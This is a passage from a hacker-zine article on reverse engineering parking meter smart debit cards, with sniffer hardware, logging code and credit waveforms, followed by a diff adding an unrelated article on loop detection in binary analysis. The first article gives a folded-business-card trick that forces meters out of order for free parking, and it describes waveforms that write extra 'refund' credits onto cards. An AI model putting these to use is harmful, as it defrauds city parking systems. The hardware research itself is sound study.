\ + / , | 00:00 <+-,-+------ Time/Credits Display + Meter Status ----+>'-''---------''-'<+----- Meter Status + | ,-------, | + | |\ |<+-------+----- Coin Slot + Smart Card Slot -----\--+->\ | | / + \ '----\--' / + \ / + \ / + \ / + \-----------/ + | ,-------, | + Money --------+-+-->o | | + | | | | + | | | | + | '-------' | + \---------/ + | | + + + For those not familiar with these devices, you can go to various +locations around town and purchase these Parking Meter Debit Cards that +are preloaded with $10, $20, or $50. To explain how to use these, I will +quote off of the instructions provided on the back of the cards: + + .--------------------------------------------------------------------. + / \ + | PARKING METER DEBIT CARD | + | | + | 1. Insert debit card into meter in direction shown by arrow. | + | The dollar balance of the card will flash 4 times. | + | 2. The Meter will increment in 6 min. segments. | + | 3. When desired time is displayed, remove card. | + | | + | DID YOU BUY TOO MUCH TIME? | + | TO OBTAIN EXTRA TIME REFUND | + | | + | * Insert the same debit card that was used to purchase time | + | on the meter. Full 6 minute increments will be credited to | + | card. Increments of less than 6 minutes will be lost. | + | | + | Parking cards may be used for ************** meters | + | which have yellow posts. | + | | + \--------------------------------------------------------------------/ + + NOTE: The increments are now 4 min due to raising prices + + I'm not including a lot of information that's provided in those +Phrack's that were mentioned, so if things look a little incomplete, +please read through them before emailing me with questions. + +Here's a list of all of my resources: + + - The ISO7816 Standard + + - Phrack 48-10/11 & 62-15 + + - Towitoko ChipDrive 130 + + - Homebrew Synchronous Protocol Sniffer (Schematics Included) + + - A few Parking Meter Debit Cards + + - A few Parking Meters + + - Computer with a Parallel Port + + - A business card or two + + +--[ 2 - ISO7816 ]--------------------------------------------------------- + + The ISO 7816 standard is one of the few resources we have to work with +when reverse engineering a smart card. It provides us with basic knowledge +of pin layouts, what the different pins do, and how to interface with +them. Unfortunately, it mostly covers asynchronous cards and doesn't +really touch on how synchronous cards work. To get more detailed +information on this please read Phrack 48-10/11. + + +--[ 3 - Synchronous Cards ]----------------------------------------------- + + Synchronous protocols are usually used with memory cards mainly to +reduce cost (since the card doesn't require an internal clock) and because +usually memory cards don't require much logic and are used for simple +applications. Asynchronous cards on the other hand have an internal clock +and can communicate with the reader at a fixed rate across the I/O line +(usually 9600 baud), asynchronous cards are usually used with processor +cards where more interaction is required (see Phrack 62-15). + + +----[ 3.1 - Memory Cards ]------------------------------------------------ + + Memory cards use a very simple protocol for sending data. First off, +because synchronous cards don't know anything about timing, their clock is +provided by the reader. In this situation, the reader can set the I/O line +when the clock is low (0v) and the card can set the I/O line when the +clock is high (5v). 
To dump all of the memory from a card, the reader +first sets the Reset line high to reset the card and keeps the clock +ticking. The first time the Reset line is low and the Clock is raised the +card will set the I/O line to whatever the 0 bit is in memory, the second +time it's raised, the card will set the I/O line to whatever the 1 bit is +in memory, etc. This is repeated until all of the data is dumped from the +card. + + __________________ +_| |___________________________________________ Reset + : : + : _____ : _____ _____ _____ _____ +_:_______| |____:_| |_____| |_____| |_____| Clk + : : : : : : : : : : +_:_______:__________:_:_____:_____:_____:_____:_____:_____:_____ +_:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_ (Address) + : : : : : +_: :_______:___________:___________:___________ +_XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________ Data +Bit n Bit 0 Bit 1 Bit2 Bit3 + +(Borrowed from Stephane Bausson's paper re-published in Phrack 48-10) + + +----[ 3.1 - Parking Meter Debit Cards ]----------------------------------- + + Parking Meter Debit Cards behave very similarly to standard memory +cards, however they also have to provide some basic security to make sure +people can't get free parking. This is done by using a method similar to +the European Telephone Cards (SLE4406) where there is a section of memory +on the card that acts as a one-way counter where bits are set to a certain +amount of credits, then a security fuse is blown, and now the set bits can +only be flipped from 1 -> 0. This is a standard security mechanism that +makes it so people cannot recharge their cards once the credits have been +used. The only catch is that the way that the parking meters work makes it +so you can refund unused credits to the card. + + +----[ 3.2 - Parking Meter Debit Cards ]----------------------------------- + + If my little introduction to Synchronous Smart Cards just went right +over your head, here's an example of how to attack Parking Meters without +having to deal with electronics or code. If you ever try putting an +invalid card into a parking meter, you'll notice that after about 90 +seconds of flashing error messages, it will switch over to Out-of-Order +status. Now, for convenience sake, most cities allow you to park for free +in Out-of-Order spots. (Anyone see a loophole here???) + + .----------------------------------------------------------------------. + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : <- insert folded side | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + '----------------------------------------------------------------------' + + One simple method you can use for making it less obvious that +something in the slot is making it be Out-of-Order is to fold a business +card in half (preferably not yours) and insert it into the smart card +slot. It should be the perfect length that it will go in and be very +difficult to notice and/or take out. When you're finished parking, you +should be able to pull the business card out using a credit card or small +flathead screwdriver. + + +--[ 4 - Memory Dump ]----------------------------------------------------- + + To explain how the cards handle credits and refunds, I'll first show +you how the memory on the card is laid out. This dump was done using my +Towitoko ChipDrive 130 using Towitoko's SmartCard Editor Software (very +useful). 
I highly suggest that you use a commercial smart card reader or +some sort of non-dumb reader for dealing with synchronous cards, dumb +mouse (and most home-brew) readers only work with asynchronous cards. + + 0x00: 9814 ff3c 9200 46b1 ffff ffff ffff ffff + 0x10: ffff ffff ffff ff00 0000 0000 0000 0000 + 0x20: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x30: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x40: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x50: 0000 0000 f8ff ffff ffff ffff fffc ffff + 0x60: ffff ffff ffff ffff ffff ffff ffff ffff + 0x70: ffff ffff ffff ffff ffff ffff ffff ffff + 0x80: ffff ffff ffff ffff ffff ffff ffff ffff + 0x90: ffff ffff ffff ffff ffff ffff ffff ffff + 0xa0: fcff ffff ffff ffff ffff ffff ffff ffff + 0xb0: ffff ffff ffff ffff ffff ffff ffff ffff + 0xc0: ffff ffff + + Now.. if we convert over the 0x50 line to bits and analyze it, we'll +notice this (note that bit-endianness is reversed): + + 0x50: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x54: 0001 1111 1111 1111 1111 1111 1111 1111 + 0x58: 1111 1111 1111 1111 1111 1111 1111 1111 + 0x5a: 1111 1111 0011 1111 1111 1111 1111 1111 + + For every bit that is 1 between 0x17 and 0x55:1 (note: :x notation +specifies bit offset), you get $0.10 on your card. For every bit that is 0 +between 0x5b and 0xb0 you get $0.10 in refunds. The total of these two +counters equals the amount of credits on your card. Now, how they handle +people using the refunds is by having the buffer of bits inbetween 0x55:1 +and 0x5b that can be used if there are refund bits that can be spent. This +only allows the user to use ~ $5 worth of refund bits. On this particular +card, the user has $0.60 worth of credits and $0.20 worth of refunds +making a total of $0.80 on the card (I know, I'm poor :-/). + + +--[ 5 - Synchronous Smart Card Protocol Sniffing ]------------------------ + + Now that we've figured out how they store credits on the card, we need +to figure out how the reader writes to the card. To do this, we'll need +to somehow sniff the connection and reverse engineer their protocol. The +following section will show you how to make your own synchronous smart +card protocol sniffer and give you code for sniffing the connection. + + +----[ 5.1 - Sniffer Design ]---------------------------------------------- + + There's plenty of commercial hardware out there (Season) that allow +you to sniff asynchronous smart cards, but it's a totally different story +for synchronous cards. I wasn't able to find any hardware to do this (and +being totally dumb when it comes to electronics) found someone to help me +out with this design (thx XElf). It basically taps the lines between a +smart card and the reader and runs the signals through an externally +powered buffer to make sure our parallel port doesn't drain the +connection. + + My personal implementation consists of a smart card socket I ripped +out of an old smart card reader, a peet's coffee card that I made ISO7816 +pinouts on using copper tape, all connected by torn apart floppy drive +cables, and powered by a ripped apart usb cable. You should be able to +find some pics on the net if you search around, although I guarantee +whatever you come up with will be less ghetto than me. 
+ + + Parallel Port + +D10 - Ack - I6 o-------------------------, + | +D11 - Busy - I7 o-----------------------------, + | | +D12 - Paper Out - I5 o---------------------------------, + | | | +D13 - Select - I4 o-------------------------------------, + | | | | +D25 - Gnd o-----, | | | | + | | | | | + | | | | | + External 5V (USB) | | | | | + | | | | | +5V o------------------, | | | | | + | | | | | | +0V o-------*----*-----|---*-------------------|---|---|---|-----, + | | | | | | | | | + | | ,--==--==--==--==--==--==--==--==--==--==--, | + __+__ | |_ 20 19 18 17 16 15 14 13 12 11 | | + ///// | | ] 74HCT541N | | + | |' 1 2 3 4 5 6 7 8 9 10 | | + | '--==--==--==--==--==--==--==--==--==--==--' | + | | | | | | | | | | | | + | | '---*---*---* | | | | '-----' + '-----*---------, ,---|---* | | | + | | ,-|---|---* | | + Smart Card | | | | | | *---|------, + ,----------,----------, | | | | | | | *----, | + ,-------|--* Vcc | Gnd *--|-* | | | ,-, ,-, ,-, ,-, | | + | |----------|----------| | | | | | | | | | | | | | | + | ,-----|--* Reset | Vpp | | | | | | | | | | | | | | | + | | |----------|----------| | | | | |_| |_| |_| |_| | | + | | ,---|--* Clock | I/O *--|---|-* | |r1 |r2 |r3 |r4 | | + | | | |----------|----------| | | | | |10k|10k|10k|10k | | + | | | ,-|--* RF1 | RF2 *--|---* | | | | | | | | + | | | | '----------'----------' | | | '---*---*---*---' | | + | | *-|-------------------------|-|-|----------------------' | + | *-|-|-------------------------|-|-|------------------------' + | | | | | | | + | | | | Smart Card Reader | | | + | | | | ,----------,----------, | | | + '-------|--* Vcc | Gnd *--|-' | | + | | | |----------|----------| | | + '-----|--* Reset | Vpp | | | + | | |----------|----------| | | + '---|--* Clock | I/O *--|---' | + | |----------|----------| | + '-|--* RF1 | RF2 *--|-----' + '----------'----------' + + +----[ 5.2 - Sniffer Code ]------------------------------------------------ + + To monitor the connection, compile and run this code with a log +filename as an argument. This code is written for openbsd and uses it's +i386_iopl() function to get access to writing to the ports. You may need +to modify it to work on other OSs. Due to file i/o speed limitations, it +will log to the file whenever you hit ctrl+c. 
+ + +/* + * Synchronous Smart Card Logger v1.0 [synclog.c] + * by h1kari + */ +#include +#include +#include +#include +#include + +#define BASE 0x378 +#define DATA (BASE) +#define STATUS (BASE + 1) +#define CONTROL (BASE + 2) +#define ECR (BASE + 0x402) +#define BUF_MAX (1024 * 1024 * 8) /* max log size 8mb */ + +int bufi = 0; +u_char buf[BUF_MAX]; +char *logfile; + +void +die(int signo) +{ + int i, b; + FILE *fh; + + /* open logfile and write output */ + if((fh = fopen(logfile, "w")) == NULL) { + perror("unable to open lpt log file"); + exit(1); + } + for(i = 0; i < bufi; i++) + printbits(fh, buf[i]); + + /* flush and exit out */ + fflush(fh); + fclose(fh); + _exit(0); +} + +int +printbits(FILE *fh, int b) +{ + fprintf(fh, "%d%d%d%d\n", + (b >> 7) & 1, (b >> 6) & 1, + (b >> 5) & 1, (b >> 4) & 1); +} + +int +main(int argc, char *argv[]) +{ + unsigned char a, b, c; + unsigned int *ptraddr; + unsigned int address; + + if(argc < 2) { + fprintf(stderr, "usage: %s \n", argv[0]); + exit(1); + } + + logfile = argv[1]; + + /* enable port writing privileges */ + if(i386_iopl(3)) { + printf("You need to be superuser to use this\n"); + exit(1); + } + + /* clear status flags */ + outb(STATUS, inb(STATUS) & 0x0f); + + /* set epp mode, just in case */ + outb(ECR, (inb(ECR) & 0x1f) | 0x80); + + /* log to file when we get ctrl+c */ + signal(SIGINT, die); + + /* fetch dataz0r */ + c = 0; + while(bufi < BUF_MAX) { + /* select low nibble */ + outb(CONTROL, (inb(CONTROL) & 0xf0) | 0x04); + + /* read low nibble */ + if((b = inb(STATUS)) == c) + continue; + + buf[bufi++] = c = b; /* save last state bits */ + } + + printf("buffer overflow!\n"); + die(0); +} + + + It might also help to drop the priority level when running it, if it +looks like you're having timing issues: + +# nice -n -20 ./synclog file.log + + +--[ 6 - Protocol Analysis ]----------------------------------------------- + + Once we get our log of the connection, we'll need to run it through +some tools to analyze and decode the protocol. I've put together a couple +of simple tools that'll make your life a lot easier. One will simply +decode the bytes that are transferred across based on the state changes. +The other will graph out the whole conversation 2-dimensionally so you +can graphically view patterns in the connection. + + +----[ 6.1 - Decoding Data ]----------------------------------------------- + + For decoding the data, we simply record bits to an input buffer when +the clock is in one state, and to an output buffer when the clock is in +the other. Then dump all of the bytes and reset our counter whenever +there's a reset. This should give us a dump of the data that's being +transferred between the two devices. 
+ + +/* + * Synchronous Smart Card Log Analyzer v1.0 [analyze.c] + * by h1kari + */ +#include + +#ifdef PRINTBITS +#define BYTESPERROW 8 +#else +#define BYTESPERROW 16 +#endif + +void +pushbit(u_char *byte, u_char bit, u_char n) +{ + /* add specified bit to their byte */ + *byte &= ~(1 << (7 - n)); + *byte |= (bit << (7 - n)); +} + +void +printbuf(u_char *buf, int len, char *io) +{ + int i, b; + + printf("%s:\n", io); + + for(i = 0; i < len; i++) { +#ifdef PRINTBITS + int j; + + for(j = 7; j >= 0; j--) + printf("%d", (buf[i] >> j) & 1); + putchar(' '); +#else + printf("%02x ", buf[i]); +#endif + if((i % BYTESPERROW) == BYTESPERROW - 1) + printf("\n"); + } + + if((i % BYTESPERROW) != 0) { + printf("\n"); + } +} + +int +main(int argc, char *argv[]) +{ + u_char ibit, obit; + u_char ibyte, obyte; + u_char clk, rst, bit; + u_char lclk; + u_char ibuf[1024 * 1024], obuf[1024 * 1024]; + int ii = 0, oi = 0; + char line[1024]; + FILE *fh; + + if(argc < 2) { + fprintf(stderr, "usage: %s \n", argv[0]); + exit(1); + } + + if((fh = fopen(argv[1], "r")) == NULL) { + perror("unable to open lpt log\n"); + exit(1); + } + + lclk = 2; + while(fgets(line, 1024, fh) != NULL) { + bit = line[0] - 48; + rst = line[2] - 48; + clk = line[3] - 48; + bit = bit ? 0 : 1; + + if(lclk == 2) lclk = clk; + + /* print out buffers when we get a reset */ + if(rst) { + if(ii > 0 && oi > 0) { + printbuf(ibuf, ii, "input"); + printbuf(obuf, oi, "output"); + } + ibit = obit = 0; + ibyte = obyte = 0; + ii = oi = 0; + } + + /* if clock high input */ + if(clk) { + /* incr on clock change */ + if(lclk != clk) obit++; + pushbit(&ibyte, bit, ibit); + /* otherwise output */ + } else { + /* incr on clock change */ + if(lclk != clk) ibit++; + pushbit(&obyte, bit, obit); + } + + /* next byte */ + if(ibit == 8) { + ibuf[ii++] = ibyte; + ibit = 0; + } + + if(obit == 8) { + obuf[oi++] = obyte; + obit = 0; + } + + /* save last clock */ + lclk = clk; + } +} + + +----[ 6.2 - Timing Graph ]------------------------------------------------ + + Sometimes it really helps to see data graphically instead of just a +bunch of hex and 1's and 0's, so my friend pr0le threw together this perl +script that creates an image with a time diagram of the lines. By +analyzing this it made it easier to see how they were performing reads +and writes to the card. 
+ + + +#!/usr/bin/perl +use GD; + +my $logfile = shift || die "usage: $0 \n"; + +open( F, "<$logfile" ); +my @lines = ; +close( F ); + +my $len = 3; + +my $im_len = scalar( @lines ); +my $w = $im_len * $len; +my $h = 100; + +my $im = new GD::Image( $w, $h ); +my $white = $im->colorAllocate( 255, 255, 255 ); +my $black = $im->colorAllocate( 0, 0, 0 ); + +$im->fill( 0, 0, $white ); + +my $i = 1; +my $init = 0; +my ($bit1,$bit2,$rst,$clk); +my ($lbit1,$lbit2,$lrst,$lclk) = (undef,undef,undef,undef); +my ($x1, $y1, $x2, $y2); +foreach my $line ( @lines ) { + ($bit1,$bit2,$rst,$clk) = ($line =~ m/^(\d)(\d)(\d)(\d)/); + if( $init ) { + &print_bit( $lbit1, $bit1, 10 ); + &print_bit( $lbit2, $bit2, 30 ); + &print_bit( $lrst, $rst, 50 ); + &print_bit( $lclk, $clk, 70 ); + } + ($lbit1,$lbit2,$lrst,$lclk) = ($bit1,$bit2,$rst,$clk); + $init = 1; + $i++; +} + +open( F, ">$logfile.jpg" ); +binmode F; +print F $im->jpeg; +close( F ); + +exit; + +sub print_bit { + my ($old, $new, $ybase) = @_; + + if( $new != $old ) { + if( $new ) { + $im->line( $i*$len, $ybase+10, $i*$len, $ybase+20, $black ); + $im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black ); + } else { + $im->line( $i*$len, $ybase+20, $i*$len, $ybase+10, $black ); + $im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black ); + } + } else { + if( $new ) { + $im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black ); + } else { + $im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black ); + } + } + + return; +} + + +----[ 6.3 - Conclusions ]------------------------------------------------- + + This code showed how the reserved lines on the smart card are used in +conjunction with credit increments and decrements. This is an analysis of +how it triggers a credit deduct or add on the card: + + + DEDUCT $0.10: + + ___________ ___________ +_________| |___________| |__________________ Reset + ____________________________________ +_____________________| |_____ Clk + ___________ +_________| |__________________________________________ I/O + ___________ +_________| |__________________________________________ Rsv1 + + Then issue write command: +00011001 00101000 11111111 00111100 +01001001 00000000 01100010 10001101 +11111111 11111111 01110111 10101101 + + + ADD $0.20: + + ___________ ___________ _____ +_________| |___________| |____________| Reset + ____________________________________ +_____________________| |_____ Clk +_____________________________________________ + |__________________ I/O + ___________________________________ +_________| |__________________ Rsv1 + + Then issue write command: +00011001 00101000 11111111 00111100 +01001001 00000000 01100010 10001101 +11111111 11111111 01110111 10101101 + _____ +__________________________________________________________| Reset + ________ ___________ ____________ +| |___________| |___________| |_____ Clk + ____________________ ________________________ +| |___________| |_____ I/O + ____________________ ________________________ +| 1 Credit |___________| 2 Credits |_____ Rsv1 + + + Since the parking meter will refund whatever remaining amount there is +to the card and doesn't have to do it one at a time like with decrements, +the write command supports writing multiple credits back onto the card. +Simply repeat the waveform above and assert Reset when you're finished +"refunding" however many credits you want. 
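
Tying the memory layout from section 4 to the credit operations above, the
balance calculation itself is just bit counting. The following is a minimal,
untested sketch: the byte ranges are the ones observed in the earlier dump
(spent-credit bits around 0x17-0x55, refund bits around 0x5b-0xb0), the
partial byte at 0x55:1 is glossed over, and a card from a different city may
lay its counters out differently.

/*
 * Rough balance calculation for a dumped parking card image.
 * The offsets below are approximations taken from the dump in
 * section 4; they are not guaranteed to match other cards.
 */
static int popcount(unsigned char b)
{
    int n = 0;

    while (b) {
        n += b & 1;
        b >>= 1;
    }
    return n;
}

double card_balance(const unsigned char *dump)
{
    int i, credit_bits = 0, refund_bits = 0;

    /* every 1 bit in this region is an unspent $0.10 credit */
    for (i = 0x17; i < 0x55; i++)
        credit_bits += popcount(dump[i]);

    /* every 0 bit in this region is a $0.10 refund */
    for (i = 0x5b; i < 0xb0; i++)
        refund_bits += 8 - popcount(dump[i]);

    return 0.10 * (credit_bits + refund_bits);
}

The exact figure you get depends on where the counter regions really begin
and end, which is precisely the kind of per-card detail a real tool would
have to pin down.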


--[ 7 - Conclusion ]------------------------------------------------------

   By now, you're probably thinking that this article sucks because there
isn't any ./code that will just give you more $. Unfortunately, most smart
card security protocols are fairly proprietary, and whatever code I released
probably wouldn't work in your particular city. And all of the data and
waveforms I've included in this article probably give the city they do
correspond to enough info to start camping white vans on my front lawn. ;-o

   Instead of lame vendor-specific code, we're aiming to give you something
much more powerful in the next part of this article, which will allow you to
emulate arbitrary smart cards and simple electronic protocols (thx spidey).
So stay tuned for the next uninformed article from Dachb0den Labs.

-h1kari 0ut
diff --git a/uninformed/1.4.txt b/uninformed/1.4.txt
new file mode 100644
index 0000000..a5de95d
--- /dev/null
+++ b/uninformed/1.4.txt
@@ -0,0 +1,380 @@
Loop Detection
Peter Silberman
peter.silberman@gmail.com

1) Foreword

Abstract: During the course of this paper the reader will gain new knowledge
about previous and new research on the subject of loop detection. The topic of
loop detection will be applied to the field of binary analysis, and a case
study will be given to illustrate its uses. All of the implementations
provided in this document have been written in C/C++ using Interactive
Disassembler (IDA) plug-ins.

Thanks: The author would like to thank Pedram Amini, thief, Halvar Flake,
skape, trew, Johnny Cache and everyone else at nologin who helped with ideas
and kept those creative juices flowing.


2) Introduction

The goal of this paper is to educate the reader both about why loop detection
is important and how it can be used. When a security researcher thinks of
insecure coding practices, things like calls to strcpy and sprintf are some of
the first things to come to mind. These function calls are considered low
hanging fruit. Some security researchers think of integer overflows or
off-by-one copy errors as types of vulnerabilities. However, not many people
consider, or think to consider, the misuse of loops as a security problem.
With that said, loops have been around since the beginning of time (that is,
since the first programming languages). The need for a language to iterate
over data to analyze each object or character has always been there. Still,
not everyone thinks to look at a loop for security problems. What if a loop
doesn't terminate correctly? Depending on the operation the loop is
performing, it's possible that it could corrupt surrounding memory regions if
not properly managed. If the loop frees memory that has already been freed, or
memory that was never allocated in the first place, a double-free or invalid
free bug has been found. These are all things that could, and do, happen in a
loop.

As the low hanging fruit is eliminated in software by security researchers and
companies doing decent to moderate QA testing, security researchers have to
look elsewhere to find vulnerabilities in software. One area that has only
been touched on briefly in the public realm is how loops operate when
translated to binaries. (BugScan, http://www.logiclibrary.com, is an example
of a company that has implemented "buffer iteration" detection but hasn't
talked publicly about it.) The reader may ask: why would one want to look at
loops?
Well, a lot of companies implement their own custom string routines, like
strcpy and strcat, which tend to be just as dangerous as the standard string
routines. These functions tend to go un-analyzed because there is no quick way
to tell that they are copying a buffer. For this reason, loop detection can
help the security researcher identify areas of interest. During the course of
this article the reader will learn about the different ways to detect loops
using graph analysis, how to implement loop detection, see a new loop
detection IDA plug-in, and walk through a case study that ties it all
together.


3) Algorithms Used to Detect Loops

A lot of research has been done on the subject of loop detection. The
research, however, was not done for the purpose of finding and exploiting
vulnerabilities that exist inside of loops. Most research has been done with
an interest in recognizing and optimizing loops (a good article about loop and
compiler optimization is
http://www.cs.princeton.edu/courses/archive/spring03/cs320/notes/loops.pdf).
Research on the optimization of loops has led scientists to classify various
types of loops. There are two distinct categories to which any loop will
belong: it is either an irreducible loop, defined as a "loop with multiple
entry [points]", or a reducible loop, defined as a "loop with one entry
[point]" (http://portal.acm.org/citation.cfm?id=236114.236115). Given that
there are two distinct categories, it stands to reason that the two types of
loops are detected in different fashions. Two popular papers on loop detection
are Interval Finding Algorithm and Identifying Loops Using DJ Graphs. This
document will cover the most widely accepted theory on loop detection.


3.1) Natural Loop Detection

One of the most well known algorithms for loop detection is demonstrated in
the book Compilers: Principles, Techniques, and Tools by Alfred V. Aho, Ravi
Sethi and Jeffrey D. Ullman. In this algorithm, the authors use a technique
that consists of two components to find natural loops. (A natural loop "has a
single entry point. The header dominates all nodes in the loop."
http://www-2.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s03/public/lectures/L7_handouts.pdf
Note that not all loops are natural loops.)

The first component of natural loop detection is to build a dominator tree out
of the control flow graph (CFG). A control flow graph is essentially a map of
code execution with directional information. A node is said to be dominated by
another node when all paths to it have to go through that other node. The
algorithm in the book calls for finding all of the dominators in a CFG. Let's
look at the actual algorithm.

Starting from the entry node, the algorithm needs to check if there is a path
to the slave node from the entry node. This path has to avoid the master node.
If it is possible to get to the slave node without touching the master node,
it can be determined that the master node does not dominate the slave node. If
it is not possible to get to the slave node, it is determined that the master
node does dominate the slave. To implement this routine the user would call
the is_path_to(ea_t from, ea_t to, ea_t avoid) function included in
loopdetection.cpp. This function checks whether there is a path from the node
specified by from to the node specified by to that avoids the node specified
in avoid.
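
Stripped of the IDA specifics, the check described above is just a depth-first
search that refuses to step on the avoided node. The listing below is a
generic, adjacency-matrix sketch of that idea; it is not the plug-in's
loopdetection.cpp code, and the graph representation is invented purely for
illustration.

#include <string.h>

#define MAX_NODES 1024

/* adj[a][b] is non-zero when the control flow graph has an edge a -> b */
static unsigned char adj[MAX_NODES][MAX_NODES];
static unsigned char visited[MAX_NODES];

/* Is there a path from 'from' to 'to' that never touches 'avoid'? */
static int path_avoiding(int from, int to, int avoid)
{
    int next;

    if (from == avoid || visited[from])
        return 0;
    if (from == to)
        return 1;

    visited[from] = 1;
    for (next = 0; next < MAX_NODES; next++)
        if (adj[from][next] && path_avoiding(next, to, avoid))
            return 1;
    return 0;
}

/* 'master' dominates 'slave' when no path from the entry node can
 * reach 'slave' while avoiding 'master'. */
int dominates(int entry, int master, int slave)
{
    memset(visited, 0, sizeof(visited));
    return !path_avoiding(entry, slave, master);
}

The two-argument is_path_to mentioned later is the same search with no avoided
node.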
Figure 1 illustrates this algorithm.

As the reader can see from Figure 1, there is a loop in this CFG. Let B to C
to D be the path of nodes that creates a loop; it will be represented as
B->C->D. There is also another loop from nodes B->D. Using the algorithm
described above it is possible to verify which of these nodes is involved in
the natural loop. The first question to ask is whether the flow of the program
can get from A to D while avoiding B. As the reader can see, it is impossible
in this case to get to D avoiding B. As such, a call to the is_path_to
function will tell the user that B dominates D. This can be represented as B
Dom D, and B Dom C, since there is no way to reach C or D without going
through B. One question that might be asked is: how exactly does this
demonstrate a loop? The answer is that, in fact, it doesn't. The second
component of natural loop detection checks to see if there is a link, or
backedge, from D to B that would allow the flow of the program to return to
node B to complete the loop. In the case of B->D there exists a backedge that
does complete the loop.


3.2) Problems with Natural Loop Detection

There is a very big problem with natural loops. The problem lies in the
definition of a natural loop: "a single entry point whose header dominates all
the nodes in the loop". Natural loop detection does not deal with irreducible
loops, as defined previously. This problem can be demonstrated with the next
figure.

As the reader can see, both B and D are entry points into C. Also, neither D
nor B dominates C. This throws a huge wrench into the algorithm and makes it
only able to pick up loops that fall under the specification of a natural, or
reducible, loop. (It is worth noting that it is next to impossible to produce
an irreducible loop in a high-level language without resorting to goto
statements.)


4) A Different Approach to Loop Detection

The reader has seen how to detect dominators within a CFG and how to use that
as a component to find natural loops. The previous chapter described why
natural loop detection is flawed when trying to detect irreducible loops. For
binary auditing, the tool will need to be able to pick up all loops and then
let the user deduce whether or not the loops are interesting. This chapter
will introduce the loop algorithm used in the IDA plug-in to detect loops.

To come up with an algorithm robust enough to detect loops in both the
irreducible and reducible categories, the author decided to modify the
previous definition of a natural loop. The new definition reads "a loop can
have multiple entry points and at least one link that creates a cycle." This
definition avoids the use of dominators to detect loops in the CFG.

The way this alternative algorithm works is by first making a call to the
is_reference_to(ea_t to, ea_t ref) function. The function is_reference_to will
determine if there is a reference from the ea_t specified by ref to the
parameter to. Within the loop detection algorithm, this check determines
whether there is a backedge or link that would complete a loop. The reason
this check is done first is speed: if there is no reference that would
complete a loop, then there is no reason to call is_path_to, thus preventing
unnecessary calculations. However, if there is a link or backedge, a call to
the overloaded function is_path_to(ea_t from, ea_t to) is used to determine if
the nodes that are being examined can even reach each other.
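
In generic terms the whole detection pass is a pair of nested loops over the
graph: a cheap edge check playing the role of is_reference_to, followed by a
reachability check playing the role of is_path_to. Again, this is only an
illustrative sketch with an invented graph representation, not the plug-in
source; it also makes the O(N^2) behavior discussed in the next section easy
to see.

#include <stdio.h>
#include <string.h>

#define MAX_NODES 1024

/* adj[a][b] is non-zero when the control flow graph has an edge a -> b */
static unsigned char adj[MAX_NODES][MAX_NODES];
static unsigned char mark[MAX_NODES];

/* plain depth-first reachability: can execution flow from a to b? */
static int reaches(int a, int b)
{
    int n;

    if (a == b)
        return 1;
    if (mark[a])
        return 0;
    mark[a] = 1;
    for (n = 0; n < MAX_NODES; n++)
        if (adj[a][n] && reaches(n, b))
            return 1;
    return 0;
}

/* A pair (head, tail) belongs to a loop when the graph contains an edge
 * tail -> head and head can still reach tail by following the graph's
 * edges. */
void report_loops(int nnodes)
{
    int head, tail;

    for (head = 0; head < nnodes; head++)
        for (tail = 0; tail < nnodes; tail++) {
            if (!adj[tail][head])       /* no backedge, skip the search */
                continue;
            memset(mark, 0, sizeof(mark));
            if (reaches(head, tail))
                printf("loop involving nodes %d and %d\n", head, tail);
        }
}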
The is_path_to function simulates all possible code execution conditions by
following all possible edges to determine if the flow of execution could ever
reach parameter to when starting at parameter from. The function
is_path_to(ea_t from, ea_t to) returns one (true) if there is indeed a path
from from to to. When both of these functions return one, it can be deduced
that the nodes being examined are involved in a loop.


4.1) Problems with the New Approach

Every algorithm can have small problems that make it far from optimal, and
that applies to the new approach presented above. The algorithm has not been
optimized for performance; it runs in O(N^2) time, which carries quite a load
if there are more than 600 or so nodes.

The reason that the algorithm is so time consuming is that the is_path_to
function, which computes all possible paths to and from a given node, was
implemented as a Depth First Search (DFS) rather than a Breadth First Search
(BFS). Depth First Search is much more expensive than Breadth First Search,
and because of that the algorithm may suffer in some rare cases. If the reader
is interested in how to implement a more efficient algorithm for finding the
dominators, the reader should check out Advanced Compiler Design and
Implementation by Steven S. Muchnick.

It should be noted that future versions of this plug-in will include
optimizations to the code, specifically a Breadth First Search implementation
in place of the Depth First Search, as well as other small improvements.


5) Loop Detection Using IDA Plug-ins

It is important to understand the algorithm presented in the previous chapter
before looking at the plug-in that implements it.

The plug-in described in this document uses the Function Analyzer Class
(functionanalyzer) that was developed by Pedram Amini
(http://labs.idefense.com) as its base class. The Loop Detection
(loopdetection) class uses inheritance to glean its attributes from Function
Analyzer. The reason inheritance is used is primarily for ease of development.
Inheritance is also used so that instead of having to re-add functions to a
new version of Function Analyzer, the user only has to replace the old file.
The final reason inheritance is used is code conformity, which is accomplished
by creating virtual functions. These virtual functions allow the user to
override methods that are implemented in Function Analyzer. This means that if
a user understands the structure of Function Analyzer, they should not have a
hard time understanding the structure of loop detection.


5.1) Plug-in Usage

To best utilize this plug-in the user needs to understand its features and
capabilities. When a user runs the plug-in, they will be prompted with the
window shown in the figure below. Each of the options shown there is described
individually.


Graph Loop

This feature will visualize the loops, marking the entry of a loop with a
green border, the exit of a loop with a red border, and a loop node with a
yellow border.


Highlight Function Calls

This option allows the user to highlight the background of any function call
made within the loop. The highlighting is done within IDA View.


Output Stack Information

This is a feature that is only enabled with the graph loop option.
